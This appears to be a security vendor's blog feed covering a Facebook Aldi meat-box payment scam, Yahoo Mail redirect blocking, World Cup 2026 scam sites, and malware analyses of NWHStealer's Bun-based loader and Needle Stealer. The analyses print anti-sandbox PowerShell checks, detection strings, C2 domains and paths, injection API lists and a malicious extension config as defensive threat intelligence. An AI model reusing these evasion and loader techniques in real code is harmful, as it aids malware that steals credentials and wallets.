Normal view

Facebook scam promises cheap Aldi meat boxes, steals payment info instead

19 May 2026 at 14:46

Sometimes you spot posts on social media that make you wonder if any moderation takes place at all.

Which is concerning, because twothirds of all online shopping scams now start on Facebook and Instagram. Online shopping scams are alarmingly common and have become one of the most frequently reported scam types in Australia. The Dutch police have also warned specifically about fake ads promising steep discounts.

Apparently, and this is an issue we’ve flagged before, social media platforms could stop scams, but they don’t because it hurts their revenue.

The Aldi meat box scam

This Facebook post immediately rattled my cage:

Facebook post about Aldi meat box

This promotion is not from Aldi and is not endorsed by the company. A random account, which may be compromised or completely fake, posts:

“My son works at Aldi and told me about something almost nobody knows. To be honest, I thought he was joking at first. If you’re over 40, you can get a meat box from Aldi for under $10. Sounds crazy, but it actually worked. They’re clearing out excess stock and, instead of throwing it away, they’re basically letting people have it for next to nothing. All I did was fill out a short form , I left the link in the comments in case it’s useful to anyone. I signed up for my husband (he’s 59 and loves a good steak), and when the box arrived, he opened it like it was his birthday. Everything looked fresh, neatly packed, and honestly there was more inside than we expected. It took me about a minute to fill out the form. If you’re over 40, definitely give it a go , worst case you lose a minute, best case you get a great box of meat almost for free.”


Scam or legit? Scam Guard knows.


There are several red flags here. Malwarebytes Scam Guard flagged:

  • Unusual offer: Promises of high-value products (“meat box from Aldi for under $10”) for an extremely low price are classic signs of scams, especially when they leverage well-known brands.
  • Anecdotal story: The post uses a personal story (“My son works at Aldi…”) to appear trustworthy and relatable, a common technique in social engineering.
  • Age restriction: Arbitrarily targeting people over 40 is a psychological trick to make the offer feel exclusive and relevant.
  • External link: The most common tactic is to provide a link in the comments rather than in the main post to avoid automatic detection by the platform.
  • Urgency and simplicity: Encourages quick action with phrases like “took me about a minute,” downplaying any possible risk.

As it turns out, the possible risk, or “worst case” as the Facebook post calls it, is a lot worse than losing a minute of your time.

The link was posted as the first comment and used the link shortening service cutt[.]ly (and here’s why you should beware of those):

The link in the first comment

The first redirect sent me to a website where my device was fingerprinted using an embedded JavaScript before redirecting me to https://gifts-survey[.]life/click?key={identifier}, a site designed to mimic the Aldi website. I had my VPN set to the US.

Aldi meat box scam leads to a fake Aldi site.

The scam page immediately creates urgency with messages like “only 1 spot left” and “you only have 2 minutes to complete the survey,” trying to stop visitors from thinking things through.

The survey itself only asks basic questions, so there wasn’t much harm in clicking through it on my virtual machine.

Aldi meat box scam - fake Aldi site.

As a reward, I got to pick three out of nine boxes to win a prize. I’m happy to report that I “aced” that test.

Aldi meat box scam leads to a fake Aldi site.

So, I was forwarded to the scammers’ real goal. On the domain hyperbargainsflow[.]shop, visitors are prompted to enter payment details for their discounted meat box, plus an optional upsell for faster delivery.

Aldi meat box scam leads to a fake Aldi site requesting payment details.

The final page asks victims to hand over personal details, including their full name, contact information, and home address, along with payment details for the fake “delivery” fee.

The site also uses tricks like more than 1,000 fake 5-star ratings and attempts to auto-complete and auto-submit the form if fields are detected as pre-populated. Saves you the trouble of submitting all your data yourself. Isn’t that nice of them?

We found that similar campaigns have targeted Woolworths customers in South Africa and Australia using fake butcher profiles, and the Aldi angle has appeared in other countries as well.

How to stay safe

If a post promises a box of premium meat for the price of a sandwich, assume it is a scam until you can prove otherwise.

The same simple checks will help you avoid this Aldi meat box scam and the next look‑alike campaign that pops up tomorrow.

  • Sometimes scrolling past the enthusiastic, fake comments will reveal what real users are saying:
Comments on the Facebook post
  • You can also help slow these scams down by reporting them. On Facebook, click the three-dot menu on the post and choose Report post > Scam, fraud or false information.
  • If a deal claims to be “known only by insiders” or “almost nobody knows this,” treat it as a red flag, not a perk. Real retailers advertise widely and on their own accounts. They don’t hide genuine promotions in badly written Facebook posts from throwaway accounts.
  • Be wary of links posted in the comments. Scammers sometimes use that tactic to avoid automated scanning and reporting on the platform.
  • Check the browser address bar carefully. Scam pages can copy a brand’s logo and colors perfectly, but the domain name usually gives the game away. 
  • Never enter card details, your full address, or your phone number into a site you reached via a random social post, especially if the offer feels too good to be true. If you already did, contact your bank or card issuer as soon as possible and monitor your statements.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with web protection. Malwarebytes blocks connections to unsafe sites like these.
Malwarebytes blocks gifts-survey[.]life
Malwarebytes blocks gifts-survey[.]life

Pro tip: Malwarebytes Scam Guard recognized the Facebook post as a scam and could have saved somebody’s day.


Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Why Malwarebytes blocks some Yahoo Mail redirects

14 May 2026 at 12:47

Some Malwarebytes users have recently noticed frequent web protection alerts while reading email in Yahoo Mail’s web interface. These alerts are caused by background connections from the Yahoo Mail page to a set of third‑party domains that our products and other security tools currently classify as risky.

What we are seeing under the hood

When you open Yahoo Mail in a browser, the page loads various embedded components for navigation, features, and metrics. As part of this, the interface makes calls to domains such as cook.howduhtable.com and related subdomains, sometimes in the context of URLs that include /ybar/mail.yahoo.com/ and a long encoded parameter. That encoded string often resolves to a URL like:

https://gpt.mail.yahoo.net/sandbox?client=novation&version=0.1&haq=1&cache=1

This suggests the traffic is being routed through what appears to be a sandboxed web component that Yahoo can use for things like telemetry, testing infrastructure, or mail features. It may also be part of an advertising or tracking flow, but at this time we cannot say with certainty exactly what purpose Yahoo is using it for.

Regardless of intent, multiple security systems have observed these redirect domains and assigned them poor reputations. Characteristics include:

  • Frequently changing, opaque subdomains that do not resemble normal consumer‑facing Yahoo addresses
  • Use of encoded parameters and chained redirects that make it difficult for users, and sometimes defenders, to see the final destination at a glance
  • Existing detections and blocklists from other vendors that classify the infrastructure as suspicious or potentially malicious

Because of these signals, Malwarebytes Web Protection and Browser Guard have been blocking a growing list of related subdomains to protect users, which is why some people see repeated alerts while using Yahoo Mail.

What we are not saying

It is important to be clear about what we do and do not know.

We have not established that Yahoo Mail itself is compromised or that Yahoo is deliberately distributing malware through its mail platform. What we can say is that third‑party or internal components invoked from within the Yahoo Mail web interface are making connections through domains that behave very similarly to infrastructure commonly associated with malicious or deceptive advertising and tracking.

From a security standpoint, this creates unnecessary risk. Any mechanism that injects content or runs sandboxed components via opaque redirect chains could, if misused or subverted in the future, expose users to harmful content without them ever clicking a suspicious link.

Blocking these domains is a precautionary step in line with our normal protection standards.

Why Malwarebytes blocks these redirects

Our decision to block these connections is based on a combination of technical behavior and third‑party reputation data:

  • The redirects are triggered by embedded components in the Yahoo Mail interface, not by users intentionally browsing to those domains
  • The infrastructure relies on frequently changing, non‑descriptive domains and subdomains, a pattern we often see in malicious or evasive advertising and tracking systems
  • Multiple security vendors and automated reputation feeds already flag these domains as risky or malicious, and some have seen them associated with unwanted or harmful activity

Because of this, Malwarebytes products currently block connections to these third‑party domains when they are invoked as part of Yahoo Mail’s web experience. This does not mean that all of Yahoo Mail is considered malicious. It means we are specifically interrupting a narrow set of background calls that present elevated risk.

What this means for users

If you use Yahoo Mail in a browser with Malwarebytes enabled, you may see:

  • Web protection or MWAC alerts referencing domains like cook.howduhtable.com or similar names while you are reading or composing email
  • Multiple alerts in a short period, because the mail interface may retry or rotate through different subdomains or IP addresses in the same family

In most cases, your email content itself still loads, though certain embedded elements, metrics, or ad‑related content may fail to load or behave differently.

How to stay safe and reduce interruptions

You should not need to lower your protection to continue using Yahoo Mail. Here are some practical steps you can take:

  • Keep Malwarebytes protection enabled
    Leaving Web Protection and Browser Guard on ensures blocks remain in place if these redirects change behavior or begin serving harmful content in the future.
  • Avoid allowlisting the suspicious domains
    While it’s technically possible to add exclusions for individual domains, doing so would allow their traffic to load unfiltered in your browser. We don’t recommend this unless you fully understand and accept the risk.
  • Use private/incognito windows for Yahoo Mail
    Accessing Yahoo Mail in a private/incognito session can help reduce persistence of certain tracking and advertising data because the browser discards cookies and local storage when you close the window.
  • Clear cookies and site data periodically
    If you see repeated alerts, clearing Yahoo‑related cookies and cached data may reduce some of the underlying tracking behavior that triggers these redirects.
  • Consider fewer‑ads options
    Yahoo offers paid plans that reduce or remove ads, and users can also use reputable content‑blocking extensions alongside Malwarebytes to cut down on ad‑driven behavior in webmail interfaces.

Our ongoing monitoring

The domains and infrastructure involved in these redirects are operated outside Malwarebytes, and their configuration or behavior may change over time. We are actively monitoring telemetry, sandbox reports, and reputation data for these domains and related infrastructure, and we will adjust our detections if new information emerges.

Our priority is to keep users safe while being transparent about why protection events occur, especially in widely used services such as webmail. If we learn more about the exact role of this component within Yahoo Mail, or if Yahoo provides additional clarity, we will update this article accordingly.


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Attackers adopt JavaScript runtime Bun to spread NWHStealer

6 May 2026 at 14:50

In our previous research, we analyzed a Windows infostealer we track as NWHStealer. The attackers behind this stealer are continuously finding new methods to distribute the stealer. During our hunting activities, we noticed how attackers are using a JavaScript runtime called Bun to help distribute it.

Bun is a legitimate, fast, all-in-one JavaScript and TypeScript toolkit designed as a modern, high-performance replacement for Node.js. It is built from the ground up to simplify modern web development by integrating several essential tools into a single executable. 

Its relative newness also makes it appealing for attackers. Bun has not yet been widely seen in malware campaigns, and it allows them to package malicious code into larger executables that may be less easily detected. 

What is NWHStealer and what can it do? 

NWHStealer is a  Rust-based stealer distributed using a range of lures and delivery methods. These include Node.js scripts, MSI installers, and, more recently, JavaScript loaders built with the Bun runtime.  

It is often hosted on legitimate platforms such as GitHub, GitLab, MediaFire, Itch.io, and SourceForge, which helps it blend in with normal software and increases the chances of users downloading it. Attackers continue to create new profiles and lures to spread the stealer. 

Once installed on your PC, NWHStealer can: 

  • Collect system information, including operating system, hardware, security software, user data and connected devices. 
  • Steal data from browsers, extensions and crypto wallets. 
  • Steal data from different applications, including FTP applications such as FileZilla, CoreFTP and messaging apps such as Steam and Discord. 
  • Inject malicious code into browser processes and run additional payloads (e.g. XMRig).
  • Attempt to bypass User Account Control (UAC). 
  • Achieve persistence via scheduled tasks. 
  • Get new command-and-control (C2) addresses from Telegram. 

How to stay safe 

Attackers are constantly adapting their techniques, and the use of newer tools like Bun shows how they try to stay ahead of detection. 

NWHStealer is particularly concerning because of how widely it is distributed, and the types of data it targets. Stolen browser data, saved passwords, and cryptocurrency wallet information can quickly lead to account takeovers, financial loss, and further compromise. 

Here are a few simple ways to stay safe: 

  • Only download software from official websites. 
  • Be cautious with downloads from platforms like GitHub, SourceForge, or file-sharing platforms unless you trust the source. 
  • Attackers are continuing to create new profiles to distribute this stealer across platforms.  Check the profile/developer/publisher’s profile, reputation, and how new it is when downloading something from file hosting providers or blogs. 
  • Check the structure of the archives, that the content, images, txt files are consistent with what you downloaded. Also check the archive name, they usually have recognizable patterns. 
  • Check the file’s publisher and signature before you run it. 

Safer. Cleaner. Ad-free browsing.


Pro tip: Install Malwarebytes Browser Guard to block malicious sites before they load. 


Technical analysis

The new distribution method: Bun JavaScript Runtime 

According to its official site, Bun is an all-in-one JavaScript, TypeScript & JSX toolkit. It’s built from scratch in Zig and powered by Apple’s JavaScriptCore engine, with a focus on fast startup and low memory usage.

Bun is composed of four main components: 

  • JavaScript Runtime: a JavaScript runtime designed as a drop-in replacement for Node.js. 
  • Package Manager: a fast alternative for npm. 
  • Test Runner: a built-in, Jest-compatible runner that executes tests much faster than standard runners. 
  • Bundler: replaces tools like Webpack, Vite, or esbuild for packaging code. 

In recent campaigns, we detected that NWHStealer is being distributed using a Bun JavaScript Runtime bundle.  

As we saw in our previous research, game-related and other software lures are used to start the infection chain. Some of the detected ZIP names in these recent campaigns include: 

  • Game-related software and cheats such as: 
    • MOUSE_PI_Trainer_v1.0.zip
    • FiveM Mod.zip
    • VampireCrawlers_Trainer_v1.0.zip
    • MagicalPrincess_Trainer_v1.0.zip 
    • TerraTechLegion_Trainer_v1.0.zip 
  • Other software such as: 
    • TradingView-Activation-Script-0.9.zip 
    • AutoTune 2026.zip
    • Metatune by Slate Digital 2026.zip
    • GoGoTv_Plus.zipAutodesk.zip

In the case analyzed in this article, the infection chain starts with an archive containing Installer.exe, which embeds JavaScript code bundled with the Bun runtime. 

The “DW” folder contains another loader, called dw.exe. This self-injection loader is similar to the one analyzed previously, but with a different decryption routine. This loader is not present in all ZIP files analyzed. 

The malicious ZIP contains two loaders
The malicious ZIP contains two loaders 

The Readme.txt file asks the user to manually launch dw.exe if the main .exe file fails to run properly. This gives the attacker two ways to distribute the stealer if the C2 of the main Bun loader is offline. The loader in dw.exe works independently from the Bun JavaScript loader. 

The Readme file inside the ZIP archive
The Readme file inside the ZIP archive
The fake Build Tools setup shown if dw.exe is started
The fake Build Tools setup shown if dw.exe is started

In this article, we don’t analyze dw.exe, as it’s a variant of the previous loaders. Instead, we focus on the JavaScript loader executed with the Bun JavaScript runtime. 

Analysis of the JavaScript Loader  

The executed JavaScript code by the Bun JavaScript runtime is inside the .bun section and is obfuscated.  

The .bun section with the obfuscated JavaScript code
The .bun section with the obfuscated JavaScript code 

The malicious code is implemented in two parts of the code: 

  • sysreq.js: performs the anti-virtualization checks with a score system. 
  • memload.js: communicates with the C2 server, performs decryption and loads the next stage. 
Entry point of the JavaScript loader

The loader runs several PowerShell CIM (Common Information Model) commands and WMI (Windows Management Instrumentation) commands to detect virtual environments. There are different controls related to CPU numbers, disk space, screen resolution, USB devices, hardware manufacturers and products, number of installed software, presence of specific folders such as Browser folders, number of running processes and username. A scoring system is implemented, and based on this score, the loader decides whether to continue with the infection or terminate it.

To detect a virtual environment, the loader executes more than 10 PowerShell commands, such as: 

  • Get-CimInstance -ClassName Win32_DiskDrive | Select-Object Model  
  • Get-CimInstance -ClassName Win32_PhysicalMemory | Select-Object Manufacturer,Speed  
  • Get-CimInstance -ClassName Win32_BIOS | Select-Object Manufacturer  
  • Get-CimInstance -ClassName Win32_BaseBoard | Select-Object Manufacturer,Product  
  • Get-CimInstance -ClassName Win32_DiskDrive | Select-Object PNPDeviceID 
  • (Get-Process -ErrorAction SilentlyContinue).Count 

The results are compared against different strings, for example:

  • Virtualization indicators: qemu, seabios, bochs, vbox, vmware, virtualbox, kvm, xen, parallels, virtio, vmbus, red hat, edk ii
  • Username sandbox: sandbox, malware, virus, sample, vmuser, wdagutilityaccount, defaultuser0
  • MAC associated with virtual environments

The strings are decrypted using XOR and base64 decoding; there are arrays of tuples and each contains the encrypted strings and a key used for XOR decryption. 

Encrypted data with XOR keys
Encrypted data with XOR keys 

Several functions handle string decryption, including one that decrypts the config used in the C2 communication. Partial config: 

C2 server: https://silent-harvester.cc
BUILD_ID: 0ddbfec60307
C2 Path: /api/status, /api/update

The loader obtains and sends an initial request to the endpoint https://C2-server/api/report with encrypted data about the compromised system: 

  • Public IP obtained with a request to api.ipify.org. 
  • System information 
  • Anti-VM result 
  • Base-64 encoded screenshot 
  • Timestamp 

Then it makes two GET HTTP requests: 

  • https://C2-server/api/status?v={BUILD_ID}, to obtain the seed used for AES key derivation. 
  • https://C2-server/api/update?v={BUILD_ID}, to obtain the encrypted payload with AES nonce and authentication tag. 

The next stage is decrypted using AES-256-CBC, with the AES data returned by the C2 and loaded with a self-injection loader using the following APIs: 

  • VirtualAlloc 
  • VirtualProtect 
  • LoadLibraryA 
  • GetProcAddress 
  • RtlAddFunctionTable
  • CreateThread 
  • SearchPathA 

These Win32 APIs are executed through the Bun module bun:ffi, which allows JavaScript to call native libraries. 

At the end of this process, NWHStealer was deployed in the analyzed cases. 

Indicators of Compromise (IOCs) 

Domains 

whale-ether[.]pro: NWH Stealer C2 server 

cosmic-nebula[.]cc: NWH Stealer C2 server 

silent-harvester[.]cc: Bun Loader C2 server 

silent-orbit[.]cc: Bun Loader C2 server 

support-onion[.]club: Bun Loader C2 server 

Hash 

d3a896f450561b2546b418b469a8e10949c7320212eb1c72b48e2b1e37c34ba5 

96fe4ddfe256dc9d2c6faea7c18e2583cd9d9c0099a4ad2cf082f569ee8379f4 

3710fb27d2032ef1eb1252ebf5c4dd516d2b2c0a83fb82c664c89e504b990fa9 

33d07aa24b217f27df6a483295c817da198e12511a6989bcc6b917feaf8e491d 

5427b4cefb329ed0e9585b3ce58a2788baf87e3b0c7221373f9bbd5f32c85b62 

308da9f49ffa1d1744e428b567792ab22712159974e9da8d8e0414ecd81de93e 

021838f30a43026084978bce187c165c6b640d8d474ec009d48078d21ec62025 

c8e96b55f13435c4b43b7209d2403f1a0e0f9deb05edc50e0f777430be693b07 

0614c4cc6375ab6bdcdd2dfa913a67d32c3e8be9b95a4a2aa09bb131b98191c8 

0020999b2e3e4d1b2cfb69e4df9440d3ce05d508573889fdc12b724ce75a0cd8 

0fa42df08cc467ec52b2d388b5575114a8ec067d13f6b1a653ec33fe879f88ca 

15f79980650393d182f81cd6e389210568aa1f5f875e515efe6cb9485d64b7fb 

20454ba58d509300fd694ae6159db4efa1b7ff965f98c29e7d087e20f96578c1 


CNET Editors' Choice Award 2026

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review


The 2026 World Cup scam economy is already running before the first whistle

4 May 2026 at 13:10

The FIFA World Cup 2026 is scheduled to begin June 11 across the US, Canada, and Mexico. The web is filling with sites impersonating ticket vendors, telecoms, sticker publishers, toy manufacturers, immigration services, and crypto projects, all linked to the World Cup brand. Together, they map out four recurring patterns of fraud and risk targeting fans.

What World Cup fans need to know

If you’re planning anything around the 2026 World Cup, whether it’s buying a ticket or merchandise, booking a flight, applying for a US visa, or speculating on “World Cup” crypto, expect a surge in scams and other risky World Cup-related activity.

The good news is the patterns are obvious once you know what to look for:

  • Countdown timers that reset when you reload the page
  • Prices 80–90% below retail
  • The word “official” used without a clear link to the brand behind it
  • Crypto tokens claiming to be “official” World Cup products

Your headline rule for the next two months: If a site uses the World Cup or a known brand to get your money, stop and verify it from the official source before you do anything else.

How these World Cup scams work

The path to these scam sites is almost always the same: a fan searches for something on search engines or social media (for example, “World Cup 2026 jersey,” “buy Panini sticker album,” “visa to attend the World Cup,” “FIFA World Cup token”) and lands one of the hundreds of sites set up to exploit that demand.

Often the route there runs through an ad network. That might involve a sponsored search result, a banner on an unrelated site, or a redirect chain that sends the victim to a different domain than the one they clicked. (Note that tools like Malwarebytes Browser Guard can block malicious ads, scam domains, and redirect chains before the page loads.)

The branding on the destination site is consistent with the legitimate company. There are testimonials and satisfied-customer counts, so nothing looks immediately wrong. Urgency tricks like “Only a few items left” and the countdown timer are there to prevent you from looking too closely or investigating too deeply.

We’ve found these sites group naturally into four categories: crypto, travel, merchandise, and predictors. The sites in each category have their own tells, but they’re united by brand parasitism: borrowing authority from FIFA, the host nations, or a real licensee like LEGO or Panini.

Crypto

The most crowded category is crypto, and the biggest risk comes from sites that claim or imply official links to the World Cup.

One site marketed its token as “the official community token celebrating the FIFA World Cup 2026,” advertising a “Mega Airdrop,” a 7-billion-token total supply, and a participant counter pinned to the symbolic number 48 (the count of qualified national teams). Another shows FIFA’s official mascot, using tournament branding to sell an unlicensed token.

None of the sites we examined are connected to FIFA. FIFA does have a real digital-collectibles ecosystem—the FIFA Collect NFT marketplace, the Right-to-Buy ticket NFTs, and the FIFA Rivals game on the Mythos chain—all of which sit on FIFA-controlled infrastructure and are documented at FIFA’s own domains. None of the sites we examined sit inside that ecosystem. The real partners for 2026 are documented and easy to verify. “World Cup token” is not one of them.

We found multiple sites using FIFA branding to create a false sense of legitimacy. But there’s a real risk you’ll receive nothing, receive something you can’t sell, or sign a transaction that gives the operator access to your wallet.

Some sites don’t pretend to be official, but still carry risk to World Cup fans. One Solana-based token branded itself the “World Cup Rug Index,” with the tagline “Every match is a market. Every loss is a rug,” and a contract ending in “pump,” the signature of pump.fun launches.

In crypto, a “rug” is when early holders sell and the price collapses, leaving later buyers with losses. These projects are not scams in the sense of pretending to be something they’re not. They are openly speculative. The risk is in the structure: early buyers can sell into demand from later buyers, who are left holding the losses.

This is different from the fake “World Cup tokens” above. Those rely on FIFA branding to create a false sense of legitimacy. These rely on momentum, where most participants arrive late.

  • There is no official World Cup token
  • There is no official World Cup token
  • There is no official World Cup token
  • There is no official World Cup token

Travel

The most dangerous category is the “World Cup visa.” One site, WC2026 Visa, advertised a “Visa to the World Cup 2026 US” for $270 per person, with a “98% Success Rate,” a countdown to June 11, and the standard reassuring trio: “Secure Process,” “Fast Processing,” “18+ only.”

There is no such product. The US Department of State has stated this directly: there is no special tournament visa. Foreign visitors traveling to the United States for the World Cup must use the same B1/B2 visitor visa, or the Visa Waiver Program with an ESTA authorisation, that any other tourist would. The only tournament-specific visa programme is FIFA PASS (the Priority Appointment Scheduling System), a routing mechanism that gives ticket holders earlier interview slots at US consulates. It doesn’t bypass the interview, it doesn’t issue a visa, it doesn’t cost $270, and access to it begins with buying a ticket directly from FIFA.

A site advertising a dedicated “World Cup visa” tricks people into believing they’re going down an official immigration pathway. Any personal data harvested in the process, such as passport details, date of birth, travel plans, and in some flows a payment instrument, gives the operator all the data they need for identity theft. Fans should only apply through .gov sites in the US, .gc.ca in Canada, and .gob.mx in Mexico.

Travel portals aggregating tickets, flights, and hotels, and eSIM sites selling connectivity for the tournament are not inherently fraudulent and are often real businesses. But any site invoking the World Cup deserves the same scrutiny: who actually fulfils this product, what is the refund policy in writing, and is this domain legitimately connected to a known brand or partner?

  • Scam site selling World Cup tickets
  • Scam site offering Visas
  • Scam site selling World Cup tickets
  • Scam site selling eSIMs

Merchandise

The merchandise category is where the impersonation gets most aggressive, because there are real licensees to imitate. LEGO’s partnership with FIFA is genuine, announced in late 2025. It debuted with the LEGO Editions FIFA World Cup Official Trophy, joined in 2026 by player sets featuring Messi, Ronaldo, Mbappé, and Vinicius Jr. A whole cluster of LEGO-styled scam storefronts now prices the trophy set at €29.99, marked down from €299.99, an 83–90% discount. LEGO does not discount its premium licensed sets by 90%.

Related to those storefronts is the “LEGO FIFA World Cup 2026 Quiz Challenge” pattern, promising “exclusive edition rewards” for fans who complete a quiz. Quiz-funnel scams are a long-running affiliate-marketing genre, and the typical mechanic is to harvest contact information and push the user toward a subscription billing flow disguised as a shipping fee for the “prize.” LEGO does not run quiz funnels. Its real World Cup activity runs through LEGO.com and physical LEGO stores.

Counterfeit jersey storefronts have been a fixture of the open web for years, and the World Cup cycle multiplies them. Typical examples: a site branded simply “JERSEY 2026 World Cup” selling a Portugal home shirt with a “BUY 2, PAY FOR 1” overlay, a 30-day countdown, and a Trustpilot-shaped widget claiming over ten thousand satisfied customers; or a retro-jersey storefront offering Germany and Argentina shirts at $24.90 each. Search demand spikes during a World Cup year and counterfeit storefronts spin up to meet it; many will be offline shortly after the tournament ends.

Then there is the Panini-styled storefront pattern: pages advertising the official 2026 sticker album under headers like “ONE-TIME PURCHASE BY NIF” (NIF being the Portuguese personal tax identifier, a phrase that appears nowhere in legitimate Panini commerce). These pages combine sub-ten-minute countdowns, inventory counters (“There are still 127 Units”), and country-specific scarcity claims (“Only 5,000 units available for Portugal!”).

The high-pressure funnel and unusual NIF framing point to localised affiliate or look-alike storefronts, not Panini’s own commerce flow, which runs through paninistore.com and licensed retail. These are not Panini storefronts. They are look-alike commerce flows using Panini’s brand to sell through high-pressure funnels. Whether the product arrives or not, the user is not buying from the company they think they are.

  • Fake World Cup jersey site
  • Fake Panini site
  • Fake World Cup Lego site
  • Fake World Cup jersey site
  • Fake World Cup jersey site
  • Fake World Cup Lego site
  • Fake World Cup Lego site
  • Fake World Cup Lego site

Predictions and prize pools

“WorldCup Predictor” sites present a prize pool that supposedly grows with every prediction, and ask users to select a champion team from flag tiles. You are paying for entries into a pooled outcome tied to the tournament.

These sites are not pretending to be something they’re not. The risk is that they operate without clear oversight. There is no visible licensing, no clear jurisdiction, and no way to verify from the front end whether payouts are enforced or even guaranteed.

Licensed sportsbooks and regulated platforms typically do not present themselves this way. They identify their licensing authority, provide responsible gambling tools, and use verified payment processors. A “Login to play” button, a flag picker, and a floating prize pool are not the same thing.

  • “World Cup Predictor” sites are paid-entry pools, closer to unlicensed betting
  • “World Cup Predictor” sites are paid-entry pools, closer to unlicensed betting

What FIFA, the brands, and the platforms could be doing better

Many of these sites would not exist, or would be far shorter-lived, if a few things changed upstream. Brand owners with active 2026 partnerships—LEGO, Panini, the national federations, the kit manufacturers—could reduce confusion by publishing a single canonical page each, well before kickoff, listing authorized retailers and the exact SKUs and prices of their World Cup products. Someone trying to verify whether a €29.99 LEGO trophy is real should not have to triangulate between Brickset, LEGO’s newsroom, and a third-party blog.

FIFA’s own licensing communications have improved compared with past tournaments, and the LEGO and Panini announcements were clearly disclosed on inside.fifa.com. But the gap between “FIFA has announced a partnership” and “here are the only sites authorized to sell on FIFA’s behalf” remains wide. Closing it would make impersonation much harder.

Search engines and ad networks carry a large share of the structural responsibility. Visa-impersonation pages are precisely the kind of sites that surface through paid search ads against terms like “world cup visa,” and platforms have the data to detect and block them at scale.

What to do if you may have been caught

Every World Cup cycle generates its own scam economy. 2018 had fake ticket marketplaces; 2022 leaned on phishing around Qatar’s Hayya system; 2026 is building around meme coins and visa impersonation. What’s different this time is the speed: sites can be spun up, monetized, and abandoned within weeks, and AI-generated copy, mascot art, and product images have stripped away many of the visual cues people used to rely on.

This cycle’s scam economy moves fast, but the basics still work: treat unsolicited “World Cup” links with suspicion, type official domains yourself, and ignore pressure from countdown timers.

If you think you’ve been caught:

  • If you entered card details: Contact your card issuer immediately and request a refund for an unauthorized or non-delivered transaction.
  • If you submitted personal or passport data: Treat it as compromised. Monitor your credit, place a fraud alert if available, and watch for targeted phishing.
  • If you connected your crypto wallet or signed a transaction: Revoke permissions, move remaining assets to a new wallet, and stop using the old one for anything valuable.
  • If you bought goods that weren’t delivered: Keep your order confirmation, URL, and payment record. Report it to your national consumer protection body (FTC in the US, Action Fraud in the UK, or your local equivalent).

Always verify through official channels. That’s FIFA.com for tickets, paniniamerica.net or paninistore.com for stickers, LEGO.com for LEGO Editions sets, and official government sites for visas. Remember, legitimate sources do not rely on countdown timers.


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Malicious trading website drops malware that hands your browser to attackers

22 April 2026 at 14:30

During our threat hunting, we found a campaign using the same malware loader from our previous research to deliver a different threat: Needle Stealer, data-stealing malware designed to quietly harvest sensitive information from infected devices, including browser data, login sessions, and cryptocurrency wallets.

In this case, attackers used a website promoting a tool called TradingClaw (tradingclaw[.]pro), which claims to be an AI-powered assistant for TradingView.

TradingView is a legitimate platform used by traders to analyze financial markets, but this fake TradingClaw site is not part of TradingView, nor is it related to the legitimate startup tradingclaw.chat. Instead, it’s being used here as a lure to trick people into downloading malware.

What is Needle Stealer?

Needle is a modular infostealer written in Golang. In simple terms, that means it’s built in pieces, so attackers can turn features on or off depending on what they want to steal.

According to its control panel, Needle includes:

  • Needle Core: The main component, with features like form grabbing (capturing data you enter into websites) and clipboard hijacking
  • Extension module: Controls browsers, redirects traffic, injects scripts, and replaces downloads
  • Desktop wallet spoofer: Targets cryptocurrency wallet apps like Ledger, Trezor, and Exodus
  • Browser wallet spoofer: Targets browser-based wallets like MetaMask and Coinbase, including attempts to extract seed phrases

The panel also shows a “coming soon” feature to generate fake Google or Cloudflare-style pages, suggesting the attackers plan to expand into more advanced phishing techniques.

Needle Stealer panel
Needle Stealer panel

In this article, we analyze the distribution of the stealer through a fake website related to an AI service called TradingClaw. We have detected that the same stealer is also distributed by other malware such as Amadey and GCleaner. 

Analysis of the TradingClaw campaign

In this campaign, the malware is distributed through a fake website advertising TradingClaw as an AI trading tool.

Malicious TradingClaw website
Malicious TradingClaw website

The site itself behaves selectively. In some cases, visitors are shown the fake TradingClaw page, while in others they are redirected to a different site (studypages[.]com). This kind of filtering is commonly used by attackers to avoid detection and only show the malicious content to intended targets. Search engines, for example, see the Studypages version:

Studypages fake page
Google results shows the Studypages fake page

If a user proceeds, they are prompted to download a ZIP file. This file contains the first stage of the infection chain.

Like in the previous campaign, the attack relies on a technique called DLL hijacking. In simple terms, this means the malware disguises itself as a legitimate file that a trusted program will load automatically. When the program runs, it unknowingly executes the malicious code instead.

In this case, the DLL loader (named iviewers.dll) is executed first. It then loads a second-stage DLL, which ultimately injects the Needle Stealer into a legitimate Windows process (RegAsm.exe) using a technique known as process hollowing.

Needle Stealer injected in RegAsm.exe process
Needle Stealer injected in RegAsm.exe process

The stealer is developed in Golang, and most of the functions are implemented in the “ext” package. 

Part of the “exe” package
Part of the “exe” package

What the malware does

Once installed, the Needle core module can:

  • Take screenshots of the infected system
  • Steal browser data, including history, cookies, and saved information
  • Extract data from apps like Telegram and FTP clients
  • Collect files such as .txt documents and wallet data
  • Steal cryptocurrency wallet information

One of the more concerning features is its ability to install malicious browser extensions.

Malicious browser extensions

The stealer also supports the distribution of malicious browser extensions, giving attackers a powerful way to take control of the victim’s browser.

We identified multiple variations of these extensions, each with slightly different file structures and components. Behind the scenes, the malware uses built-in Golang features to unpack a hidden ZIP archive (often named base.zip or meta.zip) that contains the extension files, along with a configuration file (cfg.json).

Partial cfg.json config file:

{
  "extension_host": {},
  "api_key": "…
  "server_url": "https://C2/api/v2",
  "self_destruct": true,
  "base_extension": true,
  "ext_manifest": {
    "account_extension_type": 0,
    "active_permissions": {
      "api": [
        "history",
        "notifications",
        "storage",
        "tabs",
        "webNavigation",
        "declarativeNetRequest",
        "scripting",
        "declarativeNetRequestWithHostAccess",
        "sidePanel"
      ],
      "explicit_host": [
        "<all_urls>"
      ],
      "manifest_permissions": [],
      "scriptable_host": [
        "<all_urls>"
      ]
    },
    "commands": {
      "_execute_action": {
        "was_assigned": true
      }
    }, 
…

This configuration file is key. It tells the malware where to send stolen data (the command-and-control server), which malicious extension to install, and which features to enable.

The stealer extension is dropped in a random folder in the path %LOCALAPPDATA%\Packages\Extensions. The folder contains three main files popup.jscontent.js, and background.js.   

The malicious extension dropped
The malicious extension dropped

The extensions analyzed have Google-related names.

The fake malicious extension on Edge Browser
